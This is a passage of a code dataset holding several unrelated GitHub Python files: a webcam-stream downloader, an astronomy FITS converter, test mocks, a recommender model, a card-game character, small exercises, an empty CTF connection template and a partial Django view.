stream\n\n Returns:\n path the the Stream object serialized on disk\n '''\n return os.path.join(panc.STREAMS_DIR, stream_name + \".json\")\n\n @staticmethod\n def get_stream_names():\n '''Get names of all streams serialized on disk.\n\n Returns:\n a list of stream_name strings\n '''\n _, matches = etau.parse_glob_pattern(Stream.stream_path(\"*\"))\n return [x[0] for x in matches]\n\n @property\n def path(self):\n '''Path to the Stream serialized on disk'''\n return self.stream_path(self.stream_name)\n\n def get_live_stream_url(self):\n '''Get the URL for streaming'''\n raise NotImplementedError(\"Subclass must implement\")\n\n def download_image(self, outdir):\n '''Downloads an image from the latest stream\n\n Args:\n outdir: the output directory\n\n Returns:\n is_new_img: `True` if the image was not already on disk\n image_path: path to the downloaded image on disk\n dt: datetime object of when the image was downloaded\n '''\n raise NotImplementedError(\"Subclass must implement\")\n\n def download_image_and_store(self, outdir):\n '''Downloads an image from the latest stream, and add it to the\n database.\n\n If an image with the same filename was already on disk, no new entry is\n added to the database.\n\n Args:\n stream_name: the stream name\n outdir: the output directory\n\n Returns:\n image_path: path the the downloaded image on disk\n dt: datetime object of when the image was downloaded\n '''\n is_new_img, image_path, dt = self.download_image(outdir)\n\n if is_new_img:\n add_stream_history(self.stream_name, dt, image_path)\n\n return image_path, dt\n\n @classmethod\n def from_dict(cls, d, *args, **kwargs):\n '''Constructs a Stream object from a JSON dictionary.\n\n Args:\n d: a JSON dictionary representation of a Serializable object\n\n Returns:\n a Stream instance\n '''\n downloader_cls = etau.get_class(d[\"type\"])\n return downloader_cls._from_dict(d)\n\n @classmethod\n def from_json(cls, path, *args, **kwargs):\n '''Constructs a Stream object from a JSON file.\n\n If `stream_name` key is missing, it is automatically populated.\n\n Args:\n path: the path to the JSON file on disk\n\n Returns:\n a Stream instance\n '''\n d = etas.read_json(path)\n\n if \"stream_name\" not in d:\n d[\"stream_name\"] = os.path.splitext(os.path.basename(path))[0]\n\n return cls.from_dict(d, *args, **kwargs)\n\n @classmethod\n def from_stream_name(cls, stream_name):\n '''Constructs a Stream object.\n\n Args:\n stream_name: the name of the stream\n\n Returns:\n a Stream instance\n '''\n return cls.from_json(cls.stream_path(stream_name))\n\n @classmethod\n def _from_dict(cls, d):\n raise NotImplementedError(\"Subclass must implement\")\n\n\nclass M3U8Stream(Stream):\n '''A Stream class that reads URIs from an M3U8 chunk path'''\n def __init__(self, stream_name, GMT, webpage):\n super(M3U8Stream, self).__init__(stream_name, GMT)\n self.webpage = webpage\n\n def get_live_stream_url(self):\n url = _get_chunk_url(self.webpage)\n\n if \"videos2archives\" in url:\n url = (\n \"https://pdi-service.voxel51.com/stream-archive/\" +\n url.split(\".com/\")[1]\n )\n elif \"earthcam\" in url:\n url = (\n \"https://pdi-service.voxel51.com/stream/\" +\n url.split(\".com/\")[1]\n )\n\n return url\n\n def download_image(self, outdir):\n '''Downloads an image from the latest stream\n\n Args:\n outdir: the output directory\n\n Returns:\n is_new_img: `True` if the image was not already on disk\n image_path: path the the downloaded image on disk\n dt: datetime object of when the image was downloaded\n '''\n with etau.TempDir(basedir=panc.BASE_DIR) as tmpdir:\n # Download video\n video_path, dt = self.download_chunk(tmpdir)\n\n if not video_path:\n # this is archival data, so don't return an image\n return False, None, dt\n\n # UTC integer timestamp (epoch time)\n timestamp = int(dt.timestamp())\n\n # Create path for image\n image_path = os.path.join(\n outdir, self.stream_name, \"%d.jpg\" % timestamp)\n\n is_new_img = sample_first_frame(video_path, image_path)\n\n return is_new_img, image_path, dt\n\n def download_chunk(self, output_dir):\n '''Downloads a chunk of the given stream to the given directory.\n\n Args:\n output_dir: the output directory\n\n Returns:\n tuple of:\n - path to the downloaded video chunk\n OR None if the stream is an archive stream\n - the datetime when the video chunk was downloaded\n '''\n output_path = os.path.join(output_dir, self.stream_name)\n\n uris, chunk_path = self.get_uris_and_chunk_path()\n\n if \"archive\" in chunk_path:\n return None, datetime.utcnow()\n\n uri = uris[-1]\n\n logger.info(\"Processing URI '%s'\", uri)\n return save_video(chunk_path, uri, output_path), datetime.utcnow()\n\n @retry(stop_max_attempt_number=10, wait_fixed=100)\n def get_uris_and_chunk_path(self):\n '''Attempts to load uris from a given chunk path. Will handle HTTPS\n Errors and update the chunk path.\n\n Args:\n chunk_path: URL of the chunklist to attempt to load\n stream_name: name of the stream corresponding to chunk_path\n\n Returns:\n uris: the uris present in the chunk_path\n '''\n chunk_path = _get_chunk_url(self.webpage)\n try:\n uris = m3u8.load(chunk_path).segments.uri\n if not uris:\n chunk_path = _get_chunk_url(self.webpage)\n uris = m3u8.load(chunk_path).segments.uri\n\n except urllib.error.HTTPError:\n chunk_path = _get_chunk_url(self.webpage)\n uris = m3u8.load(chunk_path).segments.uri\n\n return uris, chunk_path\n\n @classmethod\n def _from_dict(cls, d):\n stream_name = d[\"stream_name\"]\n GMT = d[\"GMT\"]\n webpage = d[\"webpage\"]\n return cls(stream_name, GMT, webpage)\n\n\nclass MjpegStream(Stream):\n '''A Stream class that reads MJPEGs'''\n def __init__(self, stream_name, GMT, url):\n super(MjpegStream, self).__init__(stream_name, GMT)\n self.url = url\n\n def get_live_stream_url(self):\n '''Get the URL for streaming'''\n return self.url\n\n def download_image(self, outdir):\n '''Downloads an image from the latest stream\n\n Args:\n outdir: the output directory\n\n Returns:\n is_new_img: `True` if the image was not already on disk\n image_path: path the the downloaded image on disk\n dt: datetime object of when the image was downloaded\n '''\n dt = datetime.utcnow()\n\n # UTC integer timestamp (epoch time)\n timestamp = int(dt.timestamp())\n\n # Create path for image\n image_path = os.path.join(\n outdir, self.stream_name, \"%d.jpg\" % timestamp)\n etau.ensure_basedir(image_path)\n\n # Capture the current frame of the stream\n is_new_img = sample_first_frame(self.url, image_path)\n\n return is_new_img, image_path, dt\n\n @classmethod\n def _from_dict(cls, d):\n stream_name = d[\"stream_name\"]\n GMT = d[\"GMT\"]\n url = d[\"url\"]\n return cls(stream_name, GMT, url)\n\n\nclass ImageStream(Stream):\n '''A Stream class for streams that intermittently take image snapshots,\n rather than providing constant video feed.\n '''\n\n def __init__(self, stream_name, GMT, webpage, url_filter):\n super(ImageStream, self).__init__(stream_name, GMT)\n self.webpage = webpage\n self.url_filter = url_filter\n\n def get_live_stream_url(self):\n '''Get the URL for streaming'''\n # Get the source from the page\n urls = get_img_urls(self.webpage)\n filtered_urls = [u for u in urls if self.url_filter in u]\n\n if not filtered_urls:\n raise Exception(\"No URLs found for webpage: %s\" % self.webpage)\n\n # we only need one!\n url = filtered_urls[0]\n\n # Get the large version of the image instead of the thumbnail\n url = url[:-5] + \"l\" + url[-4:]\n\n return url\n\n def download_image(self, outdir):\n '''Downloads an image from the latest stream\n\n Args:\n outdir: the output directory\n\n Returns:\n is_new_img: `True` if the image was not already on disk\n image_path: path the the downloaded image on disk\n dt: datetime object of when the image was downloaded\n '''\n url = self.get_live_stream_url()\n img = self._load_image_from_url(url)\n dt = self._parse_datetime(url)\n\n # UTC integer timestamp (epoch time)\n timestamp = int(dt.timestamp())\n\n # Create path for image\n image_path = os.path.join(\n outdir, self.stream_name, \"%d.jpg\" % timestamp)\n etau.ensure_basedir(image_path)\n\n if os.path.exists(image_path):\n is_new_img = False\n else:\n is_new_img = True\n etai.write(img, image_path)\n\n return is_new_img, image_path, dt\n\n def _load_image_from_url(self, url):\n data = requests.get(url).content\n return np.array(Image.open(io.BytesIO(data)))\n\n def _parse_datetime(self, url):\n time_str = url.split(\"/\")[-1].split(\"_\")[0]\n return datetime.strptime(time_str, \"%m%d%Y%H%M\")\n\n @classmethod\n def _from_dict(cls, d):\n stream_name = d[\"stream_name\"]\n GMT = d[\"GMT\"]\n webpage = d[\"webpage\"]\n url_filter = d[\"url_filter\"]\n return cls(stream_name, GMT, webpage, url_filter)\n\n\nclass YouTubeStream(Stream):\n '''A Stream class for YouTube live-streams.'''\n\n def __init__(self, stream_name, GMT, youtube_id):\n super(YouTubeStream, self).__init__(stream_name, GMT)\n self.youtube_id = youtube_id\n self._m3u8 = None\n\n def get_live_stream_url(self):\n '''Returns the livestream URL.'''\n return \"https://www.youtube.com/embed/%s?autoplay=1\" % self.youtube_id\n\n def get_m3u8_url(self, force=False):\n '''Returns the current best m3u8 stream.'''\n if force or self._m3u8 is None:\n ydl_opts = {}\n with YoutubeDL(ydl_opts) as ydl:\n yyy = ydl.extract_info(self.youtube_id, download=False)\n self._m3u8 = yyy['url']\n return self._m3u8\n\n def download_image(self, outdir):\n '''Downloads an image from the stream\n\n Args:\n outdir: the output directory\n\n Returns:\n is_new_img: `True` if the image was not already on disk\n image_path: path to the downloaded image on disk\n dt: datetime object of when the image was downloaded\n '''\n m3u8_url = self.get_m3u8_url()\n\n dt = datetime.utcnow()\n\n # UTC integer timestamp (epoch time)\n ts = int(dt.timestamp())\n\n # Create path for image\n image_path = os.path.join(outdir, self.stream_name, \"%d.jpg\" % ts)\n\n # Capture the current frame of the stream\n is_new_img = sample_first_frame(m3u8_url, image_path)\n\n return is_new_img, image_path, dt\n\n @classmethod\n def _from_dict(cls, d):\n stream_name = d[\"stream_name\"]\n GMT = d[\"GMT\"]\n youtube_id = d[\"youtube_id\"]\n return cls(stream_name, GMT, youtube_id)\n\n\ndef _get_chunk_url(webpage):\n driver = _configure_webdriver()\n driver.get(webpage)\n\n chunk_url = None\n num_attempts = 0\n while chunk_url is None and num_attempts < CHUNK_URL_MAX_NUM_ATTEMPTS:\n try:\n browser_log = driver.get_log(\"performance\")\n events = [\n _process_browser_log_entry(entry) for entry in browser_log]\n events = [\n e for e in events if \"Network.response\" in e[\"method\"]]\n\n for event in events:\n try:\n url = event[\"params\"][\"response\"][\"url\"]\n if \"chunk\" in url:\n chunk_url = url\n except:\n pass\n except:\n num_attempts += 1\n logger.info(\"Failed to get chunk URL from '%s'\", webpage)\n time.sleep(CHUNK_URL_SLEEP_SECONDS)\n\n driver.service.stop()\n\n if chunk_url:\n return chunk_url\n\n raise TimeoutError(\n \"Failed to get the chunklist from the network traffic\")\n\n\ndef _process_browser_log_entry(entry):\n return json.loads(entry[\"message\"])[\"message\"]\n\n\ndef _configure_webdriver():\n # Reference: https://stackoverflow.com/q/52633697\n caps = DesiredCapabilities.CHROME\n caps[\"goog:loggingPrefs\"] = {\"performance\": \"ALL\"}\n chrome_options = Options()\n chrome_options.add_argument(\"--headless\")\n driver = webdriver.Chrome(\n desired_capabilities=caps, options=chrome_options,\n executable_path=\"/usr/bin/chromedriver\")\n return driver\n","repo_name":"voxel51/pandemic51","sub_path":"pandemic51/core/streaming.py","file_name":"streaming.py","file_ext":"py","file_size_in_byte":17271,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"7"} +{"seq_id":"71032526623","text":"import numpy as np\r\nimport subprocess, os\r\nfrom datetime import datetime\r\nfrom netpbmfile import NetpbmFile\r\nfrom astropy.io import fits\r\nimport piexif\r\nfrom PIL.ExifTags import TAGS\r\n\r\n\r\nRAW_DIR = \"./raw/\"\r\nFITS_DIR = \"./fits/\"\r\n\r\nOBSERVERS = \"Shamloo_Yeganeh_Khanali\" # \"RezaRezaei\"\r\nFILTERNAME = \"V\"\r\nOBSOBJ = \"Dark\"\r\nIMAGETYP = \"Dark Frame\"\r\nTELESCOPE = \"Newton8\"\r\nLOCATION = \"Aznaveh\"\r\n\r\n# -c: standard output\r\n# -v: print verbose messages\r\n# -w: use camera white balance\r\n# -4: linear 16-bit output\r\n# -q 4: RCD demosaicing\r\n# -S 65535: set saturation level to maximum possible value for no data loss\r\nDCRAW_OPTIONS = (\"./dcraw\", \"-c\", \"-v\", \"-w\", \"-4\", \"-q\", \"4\", \"-S\", \"65535\")\r\n\r\n\r\ndef get_metadata(filepath):\r\n metadata = piexif.load(filepath)\r\n datetime = metadata[\"0th\"][piexif.ImageIFD.DateTime].decode()\r\n exposure = metadata[\"Exif\"][piexif.ExifIFD.ExposureTime]\r\n return (\r\n (\"DATE-OBS\", convert_datetime_fits(datetime)),\r\n (\"EXPTIME\", round(exposure[0] / exposure[1], 5)),\r\n (\"ISOSPEED\", metadata[\"Exif\"][piexif.ExifIFD.ISOSpeedRatings]),\r\n (\"INSTRUME\", metadata[\"0th\"][piexif.ImageIFD.Model].decode())\r\n )\r\n\r\n\r\ndef get_fits_name(metadata, has_filter=True, add_location_name=True,\r\n add_telescope_name=True):\r\n filterstr = '_' + FILTERNAME[0] if has_filter else ''\r\n locationstr = '_' + LOCATION if add_location_name else ''\r\n telescopestr = '_' + TELESCOPE if add_telescope_name else ''\r\n return (OBSERVERS + filterstr + '_' + OBSOBJ + '_' + str(metadata[1][1])\r\n + 's' + '_ISO' + str(metadata[2][1])\r\n + '_' + metadata[3][1].split(' ')[-1] + telescopestr\r\n + '_' + convert_datetime_filename(metadata[0][1])\r\n + locationstr + \".fits\")\r\n\r\n\r\ndef get_raw_data(filepath):\r\n with open(\"temp.pam\", \"wb\") as netpbm_output:\r\n subprocess.run(DCRAW_OPTIONS + (filepath,), stdout=netpbm_output)\r\n with NetpbmFile(\"temp.pam\") as netpbm_file:\r\n # Read data and reshape to correct FITS dimensions\r\n data = netpbm_file.asarray().transpose().swapaxes(1, 2)\r\n if data.shape[-2] > data.shape[-1]:\r\n data = np.rot90(data, 3, (-2, -1))\r\n os.remove(\"temp.pam\")\r\n return data\r\n\r\n\r\ndef set_fits_header(header, metadata, has_filter=True,\r\n add_telescope_name=True, add_object_name=True):\r\n while len(header) < (2 * 36 - 1):\r\n header.append()\r\n header[\"IMAGETYP\"] = IMAGETYP\r\n header[\"DATE\"] = datetime.utcnow().isoformat()[:-7]\r\n for (keyword, value) in metadata:\r\n header[keyword] = value\r\n if add_telescope_name:\r\n header[\"TELESCOP\"] = TELESCOPE\r\n if has_filter:\r\n header[\"FILTER\"] = FILTERNAME\r\n if add_object_name:\r\n header[\"OBJECT\"] = OBSOBJ\r\n header[\"OBSERVER\"] = \", \".join(OBSERVERS.upper().split('_'))\r\n\r\n\r\ndef convert_datetime_fits(metadata_datetime):\r\n date, time = metadata_datetime.split(' ')\r\n date = '-'.join(date.split(':'))\r\n return date + 'T' + time\r\n\r\n\r\ndef convert_datetime_filename(fits_datetime):\r\n date, time = fits_datetime.split('T')\r\n date = ''.join(date.split('-'))\r\n time = ''.join(time.split(':'))\r\n return date + 'T' + time\r\n\r\n\r\ndef main():\r\n for filename in os.listdir(\"./raw/\"):\r\n filepath = RAW_DIR + filename\r\n metadata = get_metadata(filepath)\r\n fitsname = get_fits_name(metadata, False, False, False)\r\n fitsfile = fits.PrimaryHDU(data=get_raw_data(filepath))\r\n set_fits_header(fitsfile.header, metadata, False, False, False)\r\n fitsfile.writeto(FITS_DIR + fitsname, overwrite=True)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"slhshamloo/astro2023","sub_path":"Conversion/astro_preprocess.py","file_name":"astro_preprocess.py","file_ext":"py","file_size_in_byte":3657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"7950875116","text":"from unittest.mock import mock_open, patch, MagicMock\n\nfrom apluslms_yamlidator.utils.yaml import load as yaml_loads\n\n\ndef _mock_open(*args, **kwargs):\n mock = mock_open(*args, **kwargs)\n def get_written_content():\n mock.return_value.write.assert_called()\n return ''.join(a[0] for a, kw in mock.return_value.write.call_args_list)\n mock.get_written_content = get_written_content\n mock.get_written_yaml = lambda: yaml_loads(get_written_content())\n return mock\n\n\nclass VFS(dict):\n \"\"\"\n mock_files creates a dictionary containing all open files in it's\n context. The dictionary works as a virtual filesystem (VFS) without\n any paths, thus all base filenames needs to be unique. The VFS is\n returned by the context manager.\n\n Contents returned via open call can be passed in `files` dictionary.\n\n with mock_files() as vfs:\n # To check if file was written to:\n vfs['filename'].return_value.write.called\n # To check contents:\n vfs['filename.txt'].get_written_content() == \"hello!\"\n # To load yaml data:\n vfs['filename.yml'].get_written_yaml() == {'hello': 'world'}\n\n # VFS also contains mocks for listdir and isfile\n vfs.mock_isfile.assert_called()\n vfs.mock_listdir.assert_called()\n \"\"\"\n def __init__(self, files):\n super().__init__(\n (fn.rsplit('/', 1)[-1], _mock_open(read_data=data))\n for fn, data in files.items()\n )\n self.mock_listdir = MagicMock(side_effect=lambda x: list(self))\n self.mock_isfile = MagicMock(side_effect=self.__contains__)\n self.mock_exists = MagicMock(side_effect=self.__contains__)\n\n def __contains__(self, fn):\n fn = fn.rsplit('/', 1)[-1]\n return super().__contains__(fn)\n\n def mock_open(self, fn, mode='r', *args, **kwargs):\n basename = fn.rsplit('/', 1)[-1]\n try:\n return self[basename](fn, mode, *args, **kwargs)\n except KeyError:\n if 'r' in mode:\n raise FileNotFoundError(fn)\n self[basename] = m = _mock_open()\n return m(fn, mode, *args, **kwargs)\n","repo_name":"apluslms/roman","sub_path":"tests/mock_files.py","file_name":"mock_files.py","file_ext":"py","file_size_in_byte":2189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"72870493662","text":"import torch\nfrom torch import nn\nimport torch.npu\nimport os\nNPU_CALCULATE_DEVICE = 0\nif os.getenv('NPU_CALCULATE_DEVICE') and str.isdigit(os.getenv('NPU_CALCULATE_DEVICE')):\n NPU_CALCULATE_DEVICE = int(os.getenv('NPU_CALCULATE_DEVICE'))\nif torch.npu.current_device() != NPU_CALCULATE_DEVICE:\n torch.npu.set_device(f'npu:{NPU_CALCULATE_DEVICE}')\n\n\nclass FM(nn.Module):\n def __init__(self, cate_fea_uniques, num_fea_size=0, emb_size=8,):\n '''\n :param cate_fea_uniques:\n :param num_fea_size: 数字特征 也就是连续特征\n :param emb_size: embed_dim\n '''\n super(FM, self).__init__()\n self.cate_fea_size = len(cate_fea_uniques)\n self.num_fea_size = num_fea_size\n\n # dense特征一阶表示\n if self.num_fea_size != 0:\n self.fm_1st_order_dense = nn.Linear(self.num_fea_size, 1)\n\n # sparse特征一阶表示\n self.fm_1st_order_sparse_emb = nn.ModuleList([\n nn.Embedding(voc_size, 1) for voc_size in cate_fea_uniques\n ])\n\n # sparse特征二阶表示\n self.fm_2nd_order_sparse_emb = nn.ModuleList([\n nn.Embedding(voc_size, emb_size) for voc_size in cate_fea_uniques\n ])\n self.sigmoid = nn.Sigmoid()\n\n def forward(self, X_sparse, X_dense=None):\n \"\"\"\n X_sparse: sparse_feature [batch_size, sparse_feature_num]\n X_dense: dense_feature [batch_size, dense_feature_num]\n \"\"\"\n \"\"\"FM部分\"\"\"\n # 一阶 包含sparse_feature和dense_feature的一阶\n fm_1st_sparse_res = [emb(X_sparse[:, i].unsqueeze(1)).view(-1, 1)\n for i, emb in enumerate(self.fm_1st_order_sparse_emb)] # sparse特征嵌入成一维度\n fm_1st_sparse_res = torch.cat(fm_1st_sparse_res, dim=1) # torch.Size([2, 26])\n fm_1st_sparse_res = torch.sum(fm_1st_sparse_res, 1, keepdim=True) # [bs, 1] 将sparse_feature通过全连接并相加整成一维度\n\n if X_dense is not None:\n fm_1st_dense_res = self.fm_1st_order_dense(X_dense) # 将dense_feature压到一维度\n fm_1st_part = fm_1st_sparse_res + fm_1st_dense_res\n else:\n fm_1st_part = fm_1st_sparse_res # [bs, 1]\n\n # 二阶\n fm_2nd_order_res = [emb(X_sparse[:, i].unsqueeze(1)) for i, emb in enumerate(self.fm_2nd_order_sparse_emb)]\n fm_2nd_concat_1d = torch.cat(fm_2nd_order_res, dim=1) # batch_size, sparse_feature_nums, emb_size\n # print(fm_2nd_concat_1d.size()) # torch.Size([2, 26, 8])\n\n # 先求和再平方\n sum_embed = torch.sum(fm_2nd_concat_1d, 1) # batch_size, emb_size\n square_sum_embed = sum_embed * sum_embed # batch_size, emb_size\n\n # 先平方再求和\n square_embed = fm_2nd_concat_1d * fm_2nd_concat_1d # batch_size, sparse_feature_num, emb_size]\n sum_square_embed = torch.sum(square_embed, 1) # batch_size, emb_size\n\n # 相减除以2\n sub = square_sum_embed - sum_square_embed\n sub = sub * 0.5 # batch_size, emb_size\n\n # 再求和\n fm_2nd_part = torch.sum(sub, 1, keepdim=True) # batch_size, 1\n\n out = fm_1st_part + fm_2nd_part # batch_size, 1\n out = self.sigmoid(out)\n return out\n","repo_name":"Ascend/ModelZoo-PyTorch","sub_path":"PyTorch/dev/others/Widedeep_ID2866_for_PyTorch/FM/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3263,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"7"} +{"seq_id":"5201834995","text":"from genius_invocation.card.character.import_head import *\n\nclass Thrust(NormalAttack):\n# 突刺\n id = 23011\n name = 'Thrust'\n name_ch = '突刺'\n type: SkillType = SkillType.NORMAL_ATTACK\n\n # damage\n damage_type: SkillType = SkillType.NORMAL_ATTACK\n main_damage_element: ElementType = ElementType.PHYSICAL\n main_damage: int = 2\n piercing_damage: int = 0\n\n # cost\n cost = [\n {\n 'cost_num': 1,\n 'cost_type': CostType.PYRO\n },\n {\n 'cost_num': 2,\n 'cost_type': CostType.BLACK\n }\n ]\n energy_cost: int = 0\n energy_gain: int = 1\n\n def __init__(self, from_character: 'Character'):\n super().__init__(from_character)\n\n def on_call(self, game: 'GeniusGame'):\n super().on_call(game)\n # 处理伤害\n self.resolve_damage(game)\n # 获得能量\n self.gain_energy(game)\n # after skill\n game.manager.invoke(EventType.AFTER_USE_SKILL, game)\n\n\nclass Prowl(ElementalSkill):\n #伺机而动\n name = 'Prowl'\n name_ch = '伺机而动'\n id = 23012\n\n type: SkillType = SkillType.ELEMENTAL_SKILL\n\n # No damage\n damage_type: SkillType = SkillType.ELEMENTAL_SKILL\n main_damage_element: ElementType = ElementType.PYRO\n main_damage: int = 1\n piercing_damage: int = 0\n\n # cost\n cost = [\n {\n 'cost_num': 3,\n 'cost_type': CostType.PYRO\n }\n ]\n energy_cost: int = 0\n energy_gain: int = 1\n\n def __init__(self, from_character: 'Character'):\n super().__init__(from_character)\n\n def on_call(self, game: 'GeniusGame'):\n super().on_call(game)\n self.resolve_damage(game)\n self.add_status(game, Stealth)\n self.gain_energy(game)\n game.manager.invoke(EventType.AFTER_USE_SKILL, game)\n\n\nclass Blade_Ablastion(ElementalBurst):\n #焚毁之风\n name = 'Blade Ablastion'\n name_ch = '焚毁之风'\n id = 23013\n type = SkillType.ELEMENTAL_BURST\n\n damage_type: SkillType = SkillType.ELEMENTAL_BURST\n main_damage_element: ElementType = ElementType.PYRO\n main_damage: int = 5\n piercing_damage: int = 0\n\n cost =[{\n 'cost_num': 3,\n 'cost_type': CostType.HYDRO\n }]\n energy_cost = 2\n energy_gain = 0\n\n def on_call(self, game:'GeniusGame'):\n super().on_call(game)\n self.consume_energy(game)\n self.resolve_damage(game)\n game.manager.invoke(EventType.AFTER_USE_SKILL, game)\n\n\nclass Stealth(Status):\n #潜行\n name = 'Stealth'\n name_ch = '潜行'\n\n def __init__(self, game: 'GeniusGame', from_player: 'GeniusPlayer', from_character: 'Character'):\n super().__init__(game, from_player, from_character)\n self.max_usage = 2\n self.usage = 2\n if self.from_character.talent:\n self.max_usage = 3\n self.usage = 3\n\n self.current_usage = self.usage\n\n def update(self):\n if self.from_character.talent:\n self.max_usage = 3\n self.usage = 3\n self.current_usage = max(self.current_usage, self.usage)\n\n def on_execute_dmg(self, game: 'GeniusGame'):\n if game.current_damage.damage_to == self.from_character:\n if game.current_damage.main_damage_element != ElementType.PIERCING:\n if game.current_damage.main_damage > 0:\n game.current_damage.main_damage -= 1\n self.current_usage -= 1\n if self.current_usage <=0:\n self.on_destroy(game)\n\n def on_dmg_add(self, game: 'GeniusGame'):\n if game.current_damage.damage_from == self.from_character:\n game.current_damage.main_damage += 1\n self.current_usage -= 1\n if self.current_usage <=0:\n self.on_destroy(game)\n\n def infusion(self, game:'GeniusGame'):\n if self.from_character.talent:\n if self.from_character == game.current_damage.damage_from:\n if game.current_damage.main_damage_element == ElementType.PHYSICAL:\n game.current_damage.main_damage_element = ElementType.HYDRO\n \n def update_listener_list(self):\n self.listeners = [\n (EventType.EXECUTE_DAMAGE, ZoneType.CHARACTER_ZONE, self.on_execute_dmg),\n (EventType.DAMAGE_ADD, ZoneType.CHARACTER_ZONE, self.on_dmg_add)\n ]\n if self.from_character.talent:\n self.listeners.append((EventType.INFUSION, ZoneType.CHARACTER_ZONE, self.infusion))\n \nclass Fatui_Pyro_Agent(Character):\n name = 'Fatui Pyro Agent'\n name_ch = '愚人众·火之债务处理人'\n id = 2301\n element = ElementType.PYRO\n element: ElementType = ElementType.PYRO\n weapon_type: WeaponType = WeaponType.OTHER\n country: CountryType = CountryType.FATUI\n init_health_point: int = 10\n max_health_point: int = 10\n skill_list = [Thrust, Prowl, Blade_Ablastion]\n max_power = 2\n \n def init_state(self, game: 'GeniusGame'):\n assert self.character_zone.has_entity(Stealth) is None\n status = Stealth(game, self.from_player, self)\n self.character_zone.add_entity(status)\n\n def __init__(self, game: 'GeniusGame', zone: 'CharacterZone', from_player: 'GeniusPlayer', index:int, from_character = None, talent = False):\n super().__init__(game, zone, from_player, index, from_character)\n self.talent = talent\n self.power = 0\n self.talent_skill = self.skills[1]\n\n def listen_talent_events(self, game: 'GeniusGame'):\n status = self.character_zone.has_entity(Stealth)\n if status is not None:\n status.listen_event(game, EventType.INFUSION, ZoneType.CHARACTER_ZONE, status.infusion)","repo_name":"flick-ai/Genius-Invokation","sub_path":"genius_invocation/card/character/characters/Fatui_Pyro_Agent.py","file_name":"Fatui_Pyro_Agent.py","file_ext":"py","file_size_in_byte":5752,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"7"} +{"seq_id":"23195826041","text":"#!/usr/bin/python3\ndef element_at(my_list, idx):\n \"\"\"retrieves the element at an index\n\n Args:\n my_list: list variable\n idx: index\n\n Returns:\n The element at the index\n \"\"\"\n if (idx < 0):\n return None\n elif (idx >= len(my_list)):\n return None\n else:\n element = my_list[idx]\n return element\n\n\nif __name__ == \"__main__\":\n my_list = [1, 2, 3, 4, 5]\n idx = 3\n print(\"Element at index {:d} is {}\".format(idx, element_at(my_list, idx)))\n","repo_name":"johnolamide/alx-higher_level_programming","sub_path":"0x03-python-data_structures/1-element_at.py","file_name":"1-element_at.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"12201155969","text":"import random\ncpu_s = 0\nuser_s = 0\n\nwhile cpu_s < 4 or user_s < 4 :\n \n a = random.randint (1 , 3)\n if a == 1 :\n cpu_ch = \"stone\"\n\n elif a == 2 :\n cpu_ch = \"paper\"\n\n elif a == 3 :\n cpu_ch = \"scissors\"\n\n user_ch = input(\"Please write one between stone paper scissors: \")\n\n print(\"💻 :\", cpu_ch ,\"and 👤 :\", user_ch)\n\n if cpu_ch == \"stone\" and user_ch == \"paper\":\n user_s = user_s + 1 \n\n elif cpu_ch == \"stone\" and user_ch == \"scissors\":\n cpu_s = cpu_s + 1\n\n elif cpu_ch == \"paper\" and user_ch == \"stone\":\n cpu_s = cpu_s + 1\n\n elif cpu_ch == \"paper\" and user_ch == \"scissors\":\n user_s = user_s + 1 \n\n elif cpu_ch == \"scissors\" and user_ch == \"stone\":\n user_s = user_s + 1 \n\n elif cpu_ch == \"scissors\" and user_ch == \"paper\":\n cpu_s = cpu_s + 1\n\n print(\"💻 :\", cpu_s, \"vs 👤 :\", user_s)\n \n\n\n\n\n","repo_name":"codeoprcode/Practice-2","sub_path":"2-Stone Paper Scissors.py","file_name":"2-Stone Paper Scissors.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"5059585106","text":"from zio import *\n\n\nLOCAL = True\n\nif LOCAL:\n target = './filename'\nelse:\n target = ('127.0.0.1',10001)\n\nio = zio(target, timeout=10000, print_read=COLORED(RAW, 'red'), print_write=COLORED(RAW, 'green'))\n\n\ndef main():\n io.interact()\n\nif __name__ =='__main__':\n main()\n","repo_name":"threezerobravoteam/PwnableLog","sub_path":"scripts/pwn_template_zio.py","file_name":"pwn_template_zio.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"71144266784","text":"from msilib.schema import File\n\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.core.files import File\nfrom .import forms\nimport re \nimport pandas as pd \nfrom .utils import get_plot, get_plot_bar\n\nfrom Text_Preparation import text_preparation\n# Create your views here.\ndef home(request):\n if request.method =='POST':\n uploaded_file = forms.File(request.POST,request.FILES)\n if uploaded_file.is_valid():\n # Getting file data directly from form field\n file = request.FILES.get('upload_file').read() \n #Getting whole dataframe\n df,user= text_preparation.TextPreparation().read_file(str(file))\n #creating the attribute of the object of function home\n home.dataframe = df\n \n # print(home.__dict__)\n res = render(request,'info.html',{'df':df,'user':user})\n return res \n else:\n form =forms.File()\n res = render(request,'index.html',{'form':form})\n return res\n\n\n\n\n# Analysis for particular user\ndef Analyzer(request):\n \n if request.method=='POST':\n selected_user = request.POST.get('user')\n num_of_msg,name,user_messages,links= text_preparation.TextPreparation().GetParticular(selected_user)\n # text_preparation.TextPreparation().GetParticular(selected_user)\n print(selected_user)\n print(num_of_msg,name)\n \n # print(home.__dict__)\n # Calculate the number of words \n total_words = text_preparation.TextPreparation().Total_words(user_messages)\n # show visual for most active user\n active_name,count = text_preparation.TextPreparation().get_visualization_for_most_active()\n chart = get_plot(active_name,count)\n #show most active month\n month, msg = text_preparation.TextPreparation().get_most_active_month()\n chart2 = get_plot_bar(month,msg)\n #presenting analysis of most active days\n active_day_x,active_day_y =text_preparation.TextPreparation().most_active_days()\n chart3 = get_plot(active_day_x,active_day_y)\n res = 